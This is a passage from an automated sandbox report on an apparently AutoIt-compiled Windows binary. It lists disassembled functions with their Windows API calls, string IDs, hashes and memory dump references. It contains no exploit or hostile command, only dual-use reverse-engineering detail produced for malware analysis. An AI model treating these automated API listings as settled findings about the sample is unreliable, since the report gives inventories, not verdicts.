                                                                                                                                                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f9f1dd30e03aa36bd1c3bc138cbcf026355d5d55640ea294ba5b68b70994321
                                                                                                                                                                                                                                                                                        • Instruction ID: 926a0deff5982f9fe6f9d728622ad9640fc32c675f09f48aaa53d85cfbfad938
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f9f1dd30e03aa36bd1c3bc138cbcf026355d5d55640ea294ba5b68b70994321
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC027F72900209AFDB14DF64CD89EAE7BB9EF48710F148119F915AB2A0DB74ED01EF60
                                                                                                                                                                                                                                                                                        Function 00F97B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00F97B67
                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F97B98
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F97BA4
                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00F97BBE
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00F97BCD
                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F97BF8
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 00F97C00
                                                                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00F97C07
                                                                                                                                                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00F97C16
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F97C1D
                                                                                                                                                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00F97C68
                                                                                                                                                                                                                                                                                        • FillRect.USER32(?,?,?), ref: 00F97C9A
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F97CBC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColor.USER32(00000012), ref: 00F97E5B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SetTextColor.GDI32(?,00F97B2D), ref: 00F97E5F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColorBrush.USER32(0000000F), ref: 00F97E75
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColor.USER32(0000000F), ref: 00F97E80
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetSysColor.USER32(00000011), ref: 00F97E9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F97EAB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SelectObject.GDI32(?,00000000), ref: 00F97EBC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SetBkColor.GDI32(?,?), ref: 00F97EC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: SelectObject.GDI32(?,?), ref: 00F97ED2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00F97EF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F97F08
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F97E22: GetWindowLongW.USER32(?,000000F0), ref: 00F97F15
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 690b2c56c87f46bbee313c1d0eb0b2f781f19f97227d8a5c9d93bea5c6d5e8fe
                                                                                                                                                                                                                                                                                        • Instruction ID: 26e0e16863a811ae33c769ac16f41df5c3c5073605e856df9d80c86f2e3e20e4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690b2c56c87f46bbee313c1d0eb0b2f781f19f97227d8a5c9d93bea5c6d5e8fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89A1C772418305BFDB11AF64DC48E6BBBA9FF48330F240A1AFA62961E0D771D944EB51
                                                                                                                                                                                                                                                                                        Function 00F01625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00F016B4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F42B07
                                                                                                                                                                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F42B40
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F42F85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F01488,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F01865
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00F42FC1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F42FD8
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F42FEE
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F42FF9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 6eb72f4ace6bb35171775eabf7ef98f65b86505766ce1b615a2861feadc92395
                                                                                                                                                                                                                                                                                        • Instruction ID: c947c17517878cd54a6f2c5a21f4269f2f9421a5fcf93a7536852dc71252b409
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6eb72f4ace6bb35171775eabf7ef98f65b86505766ce1b615a2861feadc92395
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA12B130A01205DFD765CF24CC94BA9BBF1FB44320F98456AF9559B2A1C732E886FB91
                                                                                                                                                                                                                                                                                        Function 00F8316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00F8319B
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F832C7
                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F83306
                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F83316
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F8335D
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00F83369
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F833B2
                                                                                                                                                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F833C1
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F833D1
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F833D5
                                                                                                                                                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F833E5
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F833EE
                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00F833F7
                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F83423
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F8343A
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F8347A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F8348E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F8349F
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F834D4
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F834DF
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F834EA
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F834F4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                        • Opcode ID: 8696761b6cc56c0903293951c35495333e8538afc1e8d98da31872013b915ff4
                                                                                                                                                                                                                                                                                        • Instruction ID: 4943f953cafee442967d8b0a67923b1dd151292d38bc7c6bab4749916d61fa83
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8696761b6cc56c0903293951c35495333e8538afc1e8d98da31872013b915ff4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DB14E71A00219AFEB14DFB8CD49FAEBBA9EB48710F104115F915E72E0D774AD40EBA4
                                                                                                                                                                                                                                                                                        Function 00F75524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F75532
                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00F9DC30,?,\\.\,00F9DCD0), ref: 00F7560F
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00F9DC30,?,\\.\,00F9DCD0), ref: 00F7577B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                        • Opcode ID: e38bb3c9625d2eb0125ab4318e951a30124ff9b248ba2f28db1a487003e50147
                                                                                                                                                                                                                                                                                        • Instruction ID: e56633d12cfed7fa29d60f9e5c69f0a0eb8ca1a22d8cd4779d00708528d4a10a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e38bb3c9625d2eb0125ab4318e951a30124ff9b248ba2f28db1a487003e50147
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4461A631A04A4ADBC718EF24CE92E7877A1EF54B54B24C05FE40E9B291C6A1DD42FB53
                                                                                                                                                                                                                                                                                        Function 00F91A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F91BC4
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F91BD9
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F91BE0
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F91C35
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F91C55
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F91C89
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F91CA7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F91CB9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00F91CCE
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00F91CE1
                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00F91D3D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00F91D58
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00F91D6C
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F91D84
                                                                                                                                                                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00F91DAA
                                                                                                                                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00F91DC4
                                                                                                                                                                                                                                                                                        • CopyRect.USER32(?,?), ref: 00F91DDB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00F91E46
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                        • Opcode ID: 16461e248482cb5b42f82c3883ac198885d749ab0723aaceba059229d301505b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9b218c8cbb1de310dad1b663d2eeef49e4371c863712c83fd05fad558a1c5504
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16461e248482cb5b42f82c3883ac198885d749ab0723aaceba059229d301505b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7B18E71604302AFEB14DF64C984B5AFBE5FF84350F00892DF5999B2A1C731E845EB92
                                                                                                                                                                                                                                                                                        Function 00F90CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F90D81
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90DBB
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90E25
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90E8D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90F11
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F90F61
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F90FA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FD52: _wcslen.LIBCMT ref: 00F1FD5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F62BA5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F62BD7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                        • Opcode ID: 34c2ac0fa51f491150048fe357aa86833b97dacbde62c6abfb961ebd25a32460
                                                                                                                                                                                                                                                                                        • Instruction ID: 0b9aee6059baec5dc3e3abbba8b97dff69aff94b48427ea531f71fd0b8ded709
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34c2ac0fa51f491150048fe357aa86833b97dacbde62c6abfb961ebd25a32460
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2E1E1326083028FDB14DF24C95197AB3E6FF84364B14496CF8969B3A2DB35ED45EB81
                                                                                                                                                                                                                                                                                        Function 00F02521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F025F8
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00F02600
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F0262B
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00F02633
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F02658
                                                                                                                                                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F02675
                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F02685
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F026B8
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F026CC
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00F026EA
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F02706
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F02711
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetCursorPos.USER32(?), ref: 00F019E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: ScreenToClient.USER32(00000000,?), ref: 00F019FE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000001), ref: 00F01A23
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000002), ref: 00F01A3D
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00F0199C), ref: 00F02738
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                        • Opcode ID: 98a1e441b9415fe79721d7c80cb4d9ea38d528139a8f88520bd56feac4034fed
                                                                                                                                                                                                                                                                                        • Instruction ID: 86c73d4b4cab209d92b6d8350daece983af7ef6c57f92f13b3e3ac1afece8d0a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98a1e441b9415fe79721d7c80cb4d9ea38d528139a8f88520bd56feac4034fed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4B18B31A002099FDB14DFA8CC99BAE7BB5FB48324F10422AFA05A72D0C774E941FB55
                                                                                                                                                                                                                                                                                        Function 00F616D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61A60
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A6C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F61A99
                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F61741
                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F61775
